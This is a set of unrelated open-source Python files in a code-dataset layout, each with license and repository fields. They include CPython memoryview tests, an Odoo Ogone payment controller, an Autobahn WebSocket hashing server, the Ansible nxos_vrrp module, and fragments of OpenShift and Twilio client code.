def intersperse(string, counts, separator=''):
"""
See the asserts below for examples.
"""
left, rest, right = intersperse_pat.match(string).groups()
def reverse(s): return s[::-1]
splits = split(reverse(rest), counts)
res = separator.join(map(reverse, reverse(splits)))
return left + res + right, len(splits) > 0 and len(splits) - 1 or 0
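# Examples for intersperse(), referenced by its docstring above (added for
# illustration; results checked against the implementation):
assert intersperse('100000', [3, 3], ',') == ('100,000', 1)
assert intersperse('-1000000', [3, 0], '.') == ('-1.000.000', 2)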
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
Danisan/odoo-1
|
addons/payment_ogone/controllers/main.py
|
389
|
1179
|
# -*- coding: utf-8 -*-
import logging
import pprint
import werkzeug
from openerp import http, SUPERUSER_ID
from openerp.http import request
_logger = logging.getLogger(__name__)
class OgoneController(http.Controller):
_accept_url = '/payment/ogone/test/accept'
_decline_url = '/payment/ogone/test/decline'
_exception_url = '/payment/ogone/test/exception'
_cancel_url = '/payment/ogone/test/cancel'
@http.route([
'/payment/ogone/accept', '/payment/ogone/test/accept',
'/payment/ogone/decline', '/payment/ogone/test/decline',
'/payment/ogone/exception', '/payment/ogone/test/exception',
'/payment/ogone/cancel', '/payment/ogone/test/cancel',
], type='http', auth='none')
def ogone_form_feedback(self, **post):
""" Ogone contacts using GET, at least for accept """
_logger.info('Ogone: entering form_feedback with post data %s', pprint.pformat(post)) # debug
cr, uid, context = request.cr, SUPERUSER_ID, request.context
request.registry['payment.transaction'].form_feedback(cr, uid, post, 'ogone', context=context)
return werkzeug.utils.redirect(post.pop('return_url', '/'))
|
agpl-3.0
|
rubyinhell/brython
|
www/src/Lib/test/test_memoryview.py
|
30
|
15575
|
"""Unit tests for the memoryview
Some tests are in test_bytes. Many tests that require _testbuffer.ndarray
are in test_buffer.
"""
import unittest
import test.support
import sys
import gc
import weakref
import array
import io
class AbstractMemoryTests:
source_bytes = b"abcdef"
@property
def _source(self):
return self.source_bytes
@property
def _types(self):
return filter(None, [self.ro_type, self.rw_type])
def check_getitem_with_type(self, tp):
b = tp(self._source)
oldrefcount = sys.getrefcount(b)
m = self._view(b)
self.assertEqual(m[0], ord(b"a"))
self.assertIsInstance(m[0], int)
self.assertEqual(m[5], ord(b"f"))
self.assertEqual(m[-1], ord(b"f"))
self.assertEqual(m[-6], ord(b"a"))
# Bounds checking
self.assertRaises(IndexError, lambda: m[6])
self.assertRaises(IndexError, lambda: m[-7])
self.assertRaises(IndexError, lambda: m[sys.maxsize])
self.assertRaises(IndexError, lambda: m[-sys.maxsize])
# Type checking
self.assertRaises(TypeError, lambda: m[None])
self.assertRaises(TypeError, lambda: m[0.0])
self.assertRaises(TypeError, lambda: m["a"])
m = None
self.assertEqual(sys.getrefcount(b), oldrefcount)
def test_getitem(self):
for tp in self._types:
self.check_getitem_with_type(tp)
def test_iter(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
self.assertEqual(list(m), [m[i] for i in range(len(m))])
def test_setitem_readonly(self):
if not self.ro_type:
return
b = self.ro_type(self._source)
oldrefcount = sys.getrefcount(b)
m = self._view(b)
def setitem(value):
m[0] = value
self.assertRaises(TypeError, setitem, b"a")
self.assertRaises(TypeError, setitem, 65)
self.assertRaises(TypeError, setitem, memoryview(b"a"))
m = None
self.assertEqual(sys.getrefcount(b), oldrefcount)
def test_setitem_writable(self):
if not self.rw_type:
return
tp = self.rw_type
b = self.rw_type(self._source)
oldrefcount = sys.getrefcount(b)
m = self._view(b)
m[0] = ord(b'1')
self._check_contents(tp, b, b"1bcdef")
m[0:1] = tp(b"0")
self._check_contents(tp, b, b"0bcdef")
m[1:3] = tp(b"12")
self._check_contents(tp, b, b"012def")
m[1:1] = tp(b"")
self._check_contents(tp, b, b"012def")
m[:] = tp(b"abcdef")
self._check_contents(tp, b, b"abcdef")
# Overlapping copies of a view into itself
m[0:3] = m[2:5]
self._check_contents(tp, b, b"cdedef")
m[:] = tp(b"abcdef")
m[2:5] = m[0:3]
self._check_contents(tp, b, b"ababcf")
def setitem(key, value):
m[key] = tp(value)
# Bounds checking
self.assertRaises(IndexError, setitem, 6, b"a")
self.assertRaises(IndexError, setitem, -7, b"a")
self.assertRaises(IndexError, setitem, sys.maxsize, b"a")
self.assertRaises(IndexError, setitem, -sys.maxsize, b"a")
# Wrong index/slice types
self.assertRaises(TypeError, setitem, 0.0, b"a")
self.assertRaises(TypeError, setitem, (0,), b"a")
self.assertRaises(TypeError, setitem, (slice(0,1,1), 0), b"a")
self.assertRaises(TypeError, setitem, (0, slice(0,1,1)), b"a")
self.assertRaises(TypeError, setitem, (0,), b"a")
self.assertRaises(TypeError, setitem, "a", b"a")
# Not implemented: multidimensional slices
slices = (slice(0,1,1), slice(0,1,2))
self.assertRaises(NotImplementedError, setitem, slices, b"a")
# Trying to resize the memory object
exc = ValueError if m.format == 'c' else TypeError
self.assertRaises(exc, setitem, 0, b"")
self.assertRaises(exc, setitem, 0, b"ab")
self.assertRaises(ValueError, setitem, slice(1,1), b"a")
self.assertRaises(ValueError, setitem, slice(0,2), b"a")
m = None
self.assertEqual(sys.getrefcount(b), oldrefcount)
def test_delitem(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
with self.assertRaises(TypeError):
del m[1]
with self.assertRaises(TypeError):
del m[1:4]
def test_tobytes(self):
for tp in self._types:
m = self._view(tp(self._source))
b = m.tobytes()
# This calls self.getitem_type() on each separate byte of b"abcdef"
expected = b"".join(
self.getitem_type(bytes([c])) for c in b"abcdef")
self.assertEqual(b, expected)
self.assertIsInstance(b, bytes)
def test_tolist(self):
for tp in self._types:
m = self._view(tp(self._source))
l = m.tolist()
self.assertEqual(l, list(b"abcdef"))
def test_compare(self):
# memoryviews can compare for equality with other objects
# having the buffer interface.
for tp in self._types:
m = self._view(tp(self._source))
for tp_comp in self._types:
self.assertTrue(m == tp_comp(b"abcdef"))
self.assertFalse(m != tp_comp(b"abcdef"))
self.assertFalse(m == tp_comp(b"abcde"))
self.assertTrue(m != tp_comp(b"abcde"))
self.assertFalse(m == tp_comp(b"abcde1"))
self.assertTrue(m != tp_comp(b"abcde1"))
self.assertTrue(m == m)
self.assertTrue(m == m[:])
self.assertTrue(m[0:6] == m[:])
self.assertFalse(m[0:5] == m)
# Comparison with objects which don't support the buffer API
self.assertFalse(m == "abcdef")
self.assertTrue(m != "abcdef")
self.assertFalse("abcdef" == m)
self.assertTrue("abcdef" != m)
# Unordered comparisons
for c in (m, b"abcdef"):
self.assertRaises(TypeError, lambda: m < c)
self.assertRaises(TypeError, lambda: c <= m)
self.assertRaises(TypeError, lambda: m >= c)
self.assertRaises(TypeError, lambda: c > m)
def check_attributes_with_type(self, tp):
m = self._view(tp(self._source))
self.assertEqual(m.format, self.format)
self.assertEqual(m.itemsize, self.itemsize)
self.assertEqual(m.ndim, 1)
self.assertEqual(m.shape, (6,))
self.assertEqual(len(m), 6)
self.assertEqual(m.strides, (self.itemsize,))
self.assertEqual(m.suboffsets, ())
return m
def test_attributes_readonly(self):
if not self.ro_type:
return
m = self.check_attributes_with_type(self.ro_type)
self.assertEqual(m.readonly, True)
def test_attributes_writable(self):
if not self.rw_type:
return
m = self.check_attributes_with_type(self.rw_type)
self.assertEqual(m.readonly, False)
def test_getbuffer(self):
# Test PyObject_GetBuffer() on a memoryview object.
for tp in self._types:
b = tp(self._source)
oldrefcount = sys.getrefcount(b)
m = self._view(b)
oldviewrefcount = sys.getrefcount(m)
s = str(m, "utf-8")
self._check_contents(tp, b, s.encode("utf-8"))
self.assertEqual(sys.getrefcount(m), oldviewrefcount)
m = None
self.assertEqual(sys.getrefcount(b), oldrefcount)
def test_gc(self):
for tp in self._types:
if not isinstance(tp, type):
# If tp is a factory rather than a plain type, skip
continue
class MyView():
def __init__(self, base):
self.m = memoryview(base)
class MySource(tp):
pass
class MyObject:
pass
# Create a reference cycle through a memoryview object.
# This exercises mbuf_clear().
b = MySource(tp(b'abc'))
m = self._view(b)
o = MyObject()
b.m = m
b.o = o
wr = weakref.ref(o)
b = m = o = None
# The cycle must be broken
gc.collect()
self.assertTrue(wr() is None, wr())
# This exercises memory_clear().
m = MyView(tp(b'abc'))
o = MyObject()
m.x = m
m.o = o
wr = weakref.ref(o)
m = o = None
# The cycle must be broken
gc.collect()
self.assertTrue(wr() is None, wr())
def _check_released(self, m, tp):
check = self.assertRaisesRegex(ValueError, "released")
with check: bytes(m)
with check: m.tobytes()
with check: m.tolist()
with check: m[0]
with check: m[0] = b'x'
with check: len(m)
with check: m.format
with check: m.itemsize
with check: m.ndim
with check: m.readonly
with check: m.shape
with check: m.strides
with check:
with m:
pass
# str() and repr() still function
self.assertIn("released memory", str(m))
self.assertIn("released memory", repr(m))
self.assertEqual(m, m)
self.assertNotEqual(m, memoryview(tp(self._source)))
self.assertNotEqual(m, tp(self._source))
def test_contextmanager(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
with m as cm:
self.assertIs(cm, m)
self._check_released(m, tp)
m = self._view(b)
# Can release explicitly inside the context manager
with m:
m.release()
def test_release(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
m.release()
self._check_released(m, tp)
# Can be called a second time (it's a no-op)
m.release()
self._check_released(m, tp)
def test_writable_readonly(self):
# Issue #10451: memoryview incorrectly exposes a readonly
# buffer as writable causing a segfault if using mmap
tp = self.ro_type
if tp is None:
return
b = tp(self._source)
m = self._view(b)
i = io.BytesIO(b'ZZZZ')
self.assertRaises(TypeError, i.readinto, m)
def test_getbuf_fail(self):
self.assertRaises(TypeError, self._view, {})
def test_hash(self):
# Memoryviews of readonly (hashable) types are hashable, and they
# hash as hash(obj.tobytes()).
tp = self.ro_type
if tp is None:
self.skipTest("no read-only type to test")
b = tp(self._source)
m = self._view(b)
self.assertEqual(hash(m), hash(b"abcdef"))
# Releasing the memoryview keeps the stored hash value (as with weakrefs)
m.release()
self.assertEqual(hash(m), hash(b"abcdef"))
# Hashing a memoryview for the first time after it is released
# results in an error (as with weakrefs).
m = self._view(b)
m.release()
self.assertRaises(ValueError, hash, m)
def test_hash_writable(self):
# Memoryviews of writable types are unhashable
tp = self.rw_type
if tp is None:
self.skipTest("no writable type to test")
b = tp(self._source)
m = self._view(b)
self.assertRaises(ValueError, hash, m)
def test_weakref(self):
# Check memoryviews are weakrefable
for tp in self._types:
b = tp(self._source)
m = self._view(b)
L = []
def callback(wr, b=b):
L.append(b)
wr = weakref.ref(m, callback)
self.assertIs(wr(), m)
del m
test.support.gc_collect()
self.assertIs(wr(), None)
self.assertIs(L[0], b)
# Variations on source objects for the buffer: bytes-like objects, then arrays
# with itemsize > 1.
# NOTE: support for multi-dimensional objects is unimplemented.
class BaseBytesMemoryTests(AbstractMemoryTests):
ro_type = bytes
rw_type = bytearray
getitem_type = bytes
itemsize = 1
format = 'B'
class BaseArrayMemoryTests(AbstractMemoryTests):
ro_type = None
rw_type = lambda self, b: array.array('i', list(b))
getitem_type = lambda self, b: array.array('i', list(b)).tobytes()
itemsize = array.array('i').itemsize
format = 'i'
def test_getbuffer(self):
# XXX Test should be adapted for non-byte buffers
pass
def test_tolist(self):
# XXX NotImplementedError: tolist() only supports byte views
pass
# Variations on indirection levels: memoryview, slice of memoryview,
# slice of slice of memoryview.
# This is important to test allocation subtleties.
class BaseMemoryviewTests:
def _view(self, obj):
return memoryview(obj)
def _check_contents(self, tp, obj, contents):
self.assertEqual(obj, tp(contents))
class BaseMemorySliceTests:
source_bytes = b"XabcdefY"
def _view(self, obj):
m = memoryview(obj)
return m[1:7]
def _check_contents(self, tp, obj, contents):
self.assertEqual(obj[1:7], tp(contents))
def test_refs(self):
for tp in self._types:
m = memoryview(tp(self._source))
oldrefcount = sys.getrefcount(m)
m[1:2]
self.assertEqual(sys.getrefcount(m), oldrefcount)
class BaseMemorySliceSliceTests:
source_bytes = b"XabcdefY"
def _view(self, obj):
m = memoryview(obj)
return m[:7][1:]
def _check_contents(self, tp, obj, contents):
self.assertEqual(obj[1:7], tp(contents))
# Concrete test classes
class BytesMemoryviewTest(unittest.TestCase,
BaseMemoryviewTests, BaseBytesMemoryTests):
def test_constructor(self):
for tp in self._types:
ob = tp(self._source)
self.assertTrue(memoryview(ob))
self.assertTrue(memoryview(object=ob))
self.assertRaises(TypeError, memoryview)
self.assertRaises(TypeError, memoryview, ob, ob)
self.assertRaises(TypeError, memoryview, argument=ob)
self.assertRaises(TypeError, memoryview, ob, argument=True)
class ArrayMemoryviewTest(unittest.TestCase,
BaseMemoryviewTests, BaseArrayMemoryTests):
def test_array_assign(self):
# Issue #4569: segfault when mutating a memoryview with itemsize != 1
a = array.array('i', range(10))
m = memoryview(a)
new_a = array.array('i', range(9, -1, -1))
m[:] = new_a
self.assertEqual(a, new_a)
class BytesMemorySliceTest(unittest.TestCase,
BaseMemorySliceTests, BaseBytesMemoryTests):
pass
class ArrayMemorySliceTest(unittest.TestCase,
BaseMemorySliceTests, BaseArrayMemoryTests):
pass
class BytesMemorySliceSliceTest(unittest.TestCase,
BaseMemorySliceSliceTests, BaseBytesMemoryTests):
pass
class ArrayMemorySliceSliceTest(unittest.TestCase,
BaseMemorySliceSliceTests, BaseArrayMemoryTests):
pass
def test_main():
test.support.run_unittest(__name__)
if __name__ == "__main__":
test_main()
|
bsd-3-clause
|
pawelmhm/AutobahnPython
|
examples/twisted/websocket/streaming/frame_based_server.py
|
18
|
2612
|
###############################################################################
##
## Copyright (C) 2011-2013 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
import hashlib
from twisted.internet import reactor
from autobahn.twisted.websocket import WebSocketServerFactory, \
WebSocketServerProtocol, \
listenWS
class FrameBasedHashServerProtocol(WebSocketServerProtocol):
"""
Frame-based WebSocket server that computes a running SHA-256 over the message
data received. It will respond after every frame received with the digest
computed up to that point. It can receive messages consisting of an unlimited
number of frames. The digest is reset upon each new message.
"""
def onMessageBegin(self, isBinary):
WebSocketServerProtocol.onMessageBegin(self, isBinary)
self.sha256 = hashlib.sha256()
def onMessageFrame(self, payload):
l = 0
for data in payload:
l += len(data)
self.sha256.update(data)
digest = self.sha256.hexdigest()
print("Received frame with payload length {}, compute digest: {}".format(l, digest))
self.sendMessage(digest.encode('utf8'))
def onMessageEnd(self):
self.sha256 = None
if __name__ == '__main__':
factory = WebSocketServerFactory("ws://localhost:9000")
factory.protocol = FrameBasedHashServerProtocol
enableCompression = False
if enableCompression:
from autobahn.websocket.compress import PerMessageDeflateOffer, \
PerMessageDeflateOfferAccept
## Function to accept compression offers from the client.
def accept(offers):
for offer in offers:
if isinstance(offer, PerMessageDeflateOffer):
return PerMessageDeflateOfferAccept(offer)
factory.setProtocolOptions(perMessageCompressionAccept = accept)
listenWS(factory)
reactor.run()
|
apache-2.0
|
andreMonkey/camera_processing
|
filming_test.py
|
1
|
1179
|
#!/usr/bin/python
from __future__ import absolute_import, division, print_function, unicode_literals
import picamera
import time
import pi3d
W, H = 800, 600
with picamera.PiCamera() as camera:
camera.resolution = (W, H)
camera.framerate = 24
camera.start_preview()
#NB layer argument below, fps as slow as needed for whatever's changing
DISPLAY = pi3d.Display.create(w=W, h=H, layer=4, frames_per_second=10)
DISPLAY.set_background(255, 0.0, 0.0, 0.0) # transparent
shader = pi3d.Shader("uv_flat")
CAMERA = pi3d.Camera(is_3d=False)
font = pi3d.Font("/usr/share/fonts/truetype/freefont/FreeSerif.ttf",
(128, 255, 128, 255)) # pale green, full alpha
keybd = pi3d.Keyboard()
tx = -DISPLAY.width / 2 + 250 # incr right, zero in middle
ty = DISPLAY.height / 2 - 300 # incr upwards
while DISPLAY.loop_running():
text = pi3d.String(font=font, string=time.strftime('%H:%M:%S', time.gmtime()),
camera=CAMERA, x=tx, y=ty, z=1.0, is_3d=False)
text.set_shader(shader)
text.draw()
time.sleep(0.1)
if keybd.read() == 27:
DISPLAY.destroy()
break
|
bsd-2-clause
|
hogarthj/ansible
|
lib/ansible/modules/network/nxos/nxos_vrrp.py
|
16
|
13019
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = '''
---
module: nxos_vrrp
extends_documentation_fragment: nxos
version_added: "2.1"
short_description: Manages VRRP configuration on NX-OS switches.
description:
- Manages VRRP configuration on NX-OS switches.
author:
- Jason Edelman (@jedelman8)
- Gabriele Gerbino (@GGabriele)
notes:
- Tested against NXOSv 7.3.(0)D1(1) on VIRL
- VRRP feature needs to be enabled first on the system.
- SVIs must exist before using this module.
- Interface must be a L3 port before using this module.
- C(state=absent) removes the VRRP group if it exists on the device.
- VRRP cannot be configured on loopback interfaces.
options:
group:
description:
- VRRP group number.
required: true
interface:
description:
- Full name of interface that is being managed for VRRP.
required: true
interval:
description:
- Time interval between advertisements or 'default' keyword
required: false
default: 1
version_added: 2.6
priority:
description:
- VRRP priority or 'default' keyword
default: 100
preempt:
description:
- Enable/Disable preempt.
type: bool
default: 'yes'
vip:
description:
- VRRP virtual IP address or 'default' keyword
authentication:
description:
- Clear text authentication string or 'default' keyword
admin_state:
description:
- Used to enable or disable the VRRP process.
choices: ['shutdown', 'no shutdown', 'default']
default: shutdown
state:
description:
- Specify desired state of the resource.
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- name: Ensure vrrp group 100 and vip 10.1.100.1 is on vlan10
nxos_vrrp:
interface: vlan10
group: 100
vip: 10.1.100.1
- name: Ensure removal of the vrrp group config
# vip is required to ensure the user knows what they are removing
nxos_vrrp:
interface: vlan10
group: 100
vip: 10.1.100.1
state: absent
- name: Re-config with more params
nxos_vrrp:
interface: vlan10
group: 100
vip: 10.1.100.1
preempt: false
priority: 130
authentication: AUTHKEY
'''
RETURN = '''
commands:
description: commands sent to the device
returned: always
type: list
sample: ["interface vlan10", "vrrp 150", "address 10.1.15.1",
"authentication text testing", "no shutdown"]
'''
from ansible.module_utils.network.nxos.nxos import load_config, run_commands
from ansible.module_utils.network.nxos.nxos import get_capabilities, nxos_argument_spec
from ansible.module_utils.basic import AnsibleModule
PARAM_TO_DEFAULT_KEYMAP = {
'priority': '100',
'interval': '1',
'vip': '0.0.0.0',
'admin_state': 'shutdown',
}
def execute_show_command(command, module):
if 'show run' not in command:
output = 'json'
else:
output = 'text'
commands = [{
'command': command,
'output': output,
}]
return run_commands(module, commands)[0]
def apply_key_map(key_map, table):
new_dict = {}
for key, value in table.items():
new_key = key_map.get(key)
if new_key:
if value:
new_dict[new_key] = str(value)
else:
new_dict[new_key] = value
return new_dict
def get_interface_type(interface):
if interface.upper().startswith('ET'):
return 'ethernet'
elif interface.upper().startswith('VL'):
return 'svi'
elif interface.upper().startswith('LO'):
return 'loopback'
elif interface.upper().startswith('MG'):
return 'management'
elif interface.upper().startswith('MA'):
return 'management'
elif interface.upper().startswith('PO'):
return 'portchannel'
else:
return 'unknown'
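# Hedged illustration (not part of the original module) of the prefix
# matching above, with hypothetical interface names:
#   get_interface_type('Ethernet1/1')     -> 'ethernet'
#   get_interface_type('vlan10')          -> 'svi'
#   get_interface_type('port-channel10')  -> 'portchannel'
#   get_interface_type('tunnel0')         -> 'unknown'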
def is_default(interface, module):
command = 'show run interface {0}'.format(interface)
try:
body = execute_show_command(command, module)
if 'invalid' in body.lower():
return 'DNE'
else:
raw_list = body.split('\n')
if raw_list[-1].startswith('interface'):
return True
else:
return False
    except KeyError:
return 'DNE'
def get_interface_mode(interface, intf_type, module):
command = 'show interface {0}'.format(interface)
mode = 'unknown'
body = execute_show_command(command, module)
interface_table = body['TABLE_interface']['ROW_interface']
name = interface_table.get('interface')
if intf_type in ['ethernet', 'portchannel']:
mode = str(interface_table.get('eth_mode', 'layer3'))
if mode == 'access' or mode == 'trunk':
mode = 'layer2'
elif intf_type == 'svi':
mode = 'layer3'
return mode, name
def get_vrrp_status(group, module, interface):
    command = 'show run all | section interface.{0}$'.format(interface)
    body = execute_show_command(command, module)
    vrrp_index = None
    admin_state = 'shutdown'
    if body:
        splitted_body = body.splitlines()
        for index in range(0, len(splitted_body) - 1):
            if splitted_body[index].strip() == 'vrrp {0}'.format(group):
                vrrp_index = index
        vrrp_section = splitted_body[vrrp_index::]
        for line in vrrp_section:
            if line.strip() == 'no shutdown':
                admin_state = 'no shutdown'
                break
    return admin_state
def get_existing_vrrp(interface, group, module, name):
command = 'show vrrp detail interface {0}'.format(interface)
body = execute_show_command(command, module)
vrrp = {}
vrrp_key = {
'sh_group_id': 'group',
'sh_vip_addr': 'vip',
'sh_priority': 'priority',
'sh_group_preempt': 'preempt',
'sh_auth_text': 'authentication',
'sh_adv_interval': 'interval'
}
try:
vrrp_table = body['TABLE_vrrp_group']
except (AttributeError, IndexError, TypeError):
return {}
if isinstance(vrrp_table, dict):
vrrp_table = [vrrp_table]
for each_vrrp in vrrp_table:
vrrp_row = each_vrrp['ROW_vrrp_group']
parsed_vrrp = apply_key_map(vrrp_key, vrrp_row)
if parsed_vrrp['preempt'] == 'Disable':
parsed_vrrp['preempt'] = False
elif parsed_vrrp['preempt'] == 'Enable':
parsed_vrrp['preempt'] = True
if parsed_vrrp['group'] == group:
            parsed_vrrp['admin_state'] = get_vrrp_status(group, module, name)
return parsed_vrrp
return vrrp
def get_commands_config_vrrp(delta, existing, group):
commands = []
CMDS = {
'priority': 'priority {0}',
'preempt': 'preempt',
'vip': 'address {0}',
'interval': 'advertisement-interval {0}',
'auth': 'authentication text {0}',
'admin_state': '{0}',
}
for arg in ['vip', 'priority', 'interval', 'admin_state']:
val = delta.get(arg)
if val == 'default':
val = PARAM_TO_DEFAULT_KEYMAP.get(arg)
if val != existing.get(arg):
commands.append((CMDS.get(arg)).format(val))
elif val:
commands.append((CMDS.get(arg)).format(val))
preempt = delta.get('preempt')
auth = delta.get('authentication')
if preempt:
commands.append(CMDS.get('preempt'))
elif preempt is False:
commands.append('no ' + CMDS.get('preempt'))
if auth:
if auth != 'default':
commands.append((CMDS.get('auth')).format(auth))
elif existing.get('authentication'):
commands.append('no authentication')
if commands:
commands.insert(0, 'vrrp {0}'.format(group))
return commands
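# Hedged illustration (hypothetical inputs, not part of the original module):
# with delta={'vip': '10.1.100.1', 'priority': '130', 'preempt': False},
# existing={} and group=100, the helper above yields
#   ['vrrp 100', 'address 10.1.100.1', 'priority 130', 'no preempt']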
def flatten_list(command_lists):
flat_command_list = []
for command in command_lists:
if isinstance(command, list):
flat_command_list.extend(command)
else:
flat_command_list.append(command)
return flat_command_list
def validate_params(param, module):
value = module.params[param]
if param == 'group':
try:
if (int(value) < 1 or int(value) > 255):
raise ValueError
except ValueError:
module.fail_json(msg="Warning! 'group' must be an integer between"
" 1 and 255", group=value)
elif param == 'priority':
try:
if (int(value) < 1 or int(value) > 254):
raise ValueError
except ValueError:
module.fail_json(msg="Warning! 'priority' must be an integer "
"between 1 and 254", priority=value)
def main():
argument_spec = dict(
group=dict(required=True, type='str'),
interface=dict(required=True),
interval=dict(required=False, type='str'),
priority=dict(required=False, type='str'),
preempt=dict(required=False, type='bool'),
vip=dict(required=False, type='str'),
admin_state=dict(required=False, type='str',
choices=['shutdown', 'no shutdown', 'default'],
default='shutdown'),
authentication=dict(required=False, type='str'),
state=dict(choices=['absent', 'present'], required=False, default='present')
)
argument_spec.update(nxos_argument_spec)
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)
warnings = list()
results = {'changed': False, 'commands': [], 'warnings': warnings}
state = module.params['state']
interface = module.params['interface'].lower()
group = module.params['group']
priority = module.params['priority']
interval = module.params['interval']
preempt = module.params['preempt']
vip = module.params['vip']
authentication = module.params['authentication']
admin_state = module.params['admin_state']
device_info = get_capabilities(module)
network_api = device_info.get('network_api', 'nxapi')
if state == 'present' and not vip:
module.fail_json(msg='the "vip" param is required when state=present')
intf_type = get_interface_type(interface)
if (intf_type != 'ethernet' and network_api == 'cliconf'):
if is_default(interface, module) == 'DNE':
module.fail_json(msg='That interface does not exist yet. Create '
'it first.', interface=interface)
if intf_type == 'loopback':
module.fail_json(msg="Loopback interfaces don't support VRRP.",
interface=interface)
mode, name = get_interface_mode(interface, intf_type, module)
if mode == 'layer2':
        module.fail_json(msg='That interface is a Layer 2 port.\nMake it '
                             'a Layer 3 port first.', interface=interface)
args = dict(group=group, priority=priority, preempt=preempt,
vip=vip, authentication=authentication, interval=interval,
admin_state=admin_state)
proposed = dict((k, v) for k, v in args.items() if v is not None)
existing = get_existing_vrrp(interface, group, module, name)
changed = False
end_state = existing
commands = []
if state == 'present':
delta = dict(
set(proposed.items()).difference(existing.items()))
if delta:
command = get_commands_config_vrrp(delta, existing, group)
if command:
commands.append(command)
elif state == 'absent':
if existing:
commands.append(['no vrrp {0}'.format(group)])
if commands:
commands.insert(0, ['interface {0}'.format(interface)])
commands = flatten_list(commands)
results['commands'] = commands
results['changed'] = True
if not module.check_mode:
load_config(module, commands)
if 'configure' in commands:
commands.pop(0)
module.exit_json(**results)
if __name__ == '__main__':
main()
|
gpl-3.0
|
chouseknecht/openshift-restclient-python
|
openshift/test/test_v1_project_spec.py
|
1
|
4225
|
# coding: utf-8
"""
OpenShift API (with Kubernetes)
OpenShift provides builds, application lifecycle, image content management, and administrative policy on top of Kubernetes. The API allows consistent management of those objects. All API operations are authenticated via an Authorization bearer token that is provided for service accounts as a generated secret (in JWT form) or via the native OAuth endpoint located at /oauth/authorize. Core infrastructure components may use openshift.client certificates that require no authentication. All API operations return a 'resourceVersion' string that represents the version of the object in the underlying storage. The standard LIST operation performs a snapshot read of the underlying objects, returning a resourceVersion representing a consistent version of the listed objects. The WATCH operation allows all updates to a set of objects after the provided resourceVersion to be observed by a openshift.client. By listing and beginning a watch from the returned resourceVersion, openshift.clients may observe a consistent view of the state of one or more objects. Note that WATCH always returns the update after the provided resourceVersion. Watch may be extended a limited time in the past - using etcd 2 the watch window is 1000 events (which on a large cluster may only be a few tens of seconds) so openshift.clients must explicitly handle the \"watch to old error\" by re-listing. Objects are divided into two rough categories - those that have a lifecycle and must reflect the state of the cluster, and those that have no state. Objects with lifecycle typically have three main sections: * 'metadata' common to all objects * a 'spec' that represents the desired state * a 'status' that represents how much of the desired state is reflected on the cluster at the current time Objects that have no state have 'metadata' but may lack a 'spec' or 'status' section. Objects are divided into those that are namespace scoped (only exist inside of a namespace) and those that are cluster scoped (exist outside of a namespace). A namespace scoped resource will be deleted when the namespace is deleted and cannot be created if the namespace has not yet been created or is in the process of deletion. Cluster scoped resources are typically only accessible to admins - resources like nodes, persistent volumes, and cluster policy. All objects have a schema that is a combination of the 'kind' and 'apiVersion' fields. This schema is additive only for any given version - no backwards incompatible changes are allowed without incrementing the apiVersion. The server will return and accept a number of standard responses that share a common schema - for instance, the common error type is 'metav1.Status' (described below) and will be returned on any error from the API server. The API is available in multiple serialization formats - the default is JSON (Accept: application/json and Content-Type: application/json) but openshift.clients may also use YAML (application/yaml) or the native Protobuf schema (application/vnd.kubernetes.protobuf). Note that the format of the WATCH API call is slightly different - for JSON it returns newline delimited objects while for Protobuf it returns length-delimited frames (4 bytes in network-order) that contain a 'versioned.Watch' Protobuf object. See the OpenShift documentation at https://docs.openshift.org for more information.
OpenAPI spec version: latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import openshift.client
from kubernetes.client.rest import ApiException
from openshift.client.models.v1_project_spec import V1ProjectSpec
class TestV1ProjectSpec(unittest.TestCase):
""" V1ProjectSpec unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1ProjectSpec(self):
"""
Test V1ProjectSpec
"""
# FIXME: construct object with mandatory attributes with example values
#model = openshift.client.models.v1_project_spec.V1ProjectSpec()
pass
if __name__ == '__main__':
unittest.main()
|
apache-2.0
|
YeelerG/twilio-python
|
twilio/rest/resources/phone_numbers.py
|
11
|
11396
|
import re
from twilio.exceptions import TwilioException
from .util import change_dict_key, transform_params
from .util import UNSET_TIMEOUT
from . import InstanceResource, ListResource
TYPES = {"local": "Local", "tollfree": "TollFree", "mobile": "Mobile"}
class AvailablePhoneNumber(InstanceResource):
""" An available phone number resource
.. attribute:: friendly_name
A nicely-formatted version of the phone number.
.. attribute:: phone_number
The phone number, in E.164 (i.e. "+1") format.
.. attribute:: lata
The LATA of this phone number.
.. attribute:: rate_center
The rate center of this phone number.
.. attribute:: latitude
The latitude coordinate of this phone number.
.. attribute:: longitude
The longitude coordinate of this phone number.
.. attribute:: region
The two-letter state or province abbreviation of this phone number.
.. attribute:: postal_code
The postal (zip) code of this phone number.
.. attribute:: iso_country
The country for this number
.. attribute:: address_requirements
Whether the phone number requires you or your customer to have an
Address registered with Twilio. Possible values are 'none', 'any',
'local', or 'foreign'.
.. attribute:: beta
(boolean) Phone numbers new to the Twilio platform are marked as beta.
"""
def __init__(self, parent):
# Available Phone Numbers have no sid.
super(AvailablePhoneNumber, self).__init__(parent, "")
self.name = ""
def purchase(self, **kwargs):
return self.parent.purchase(phone_number=self.phone_number,
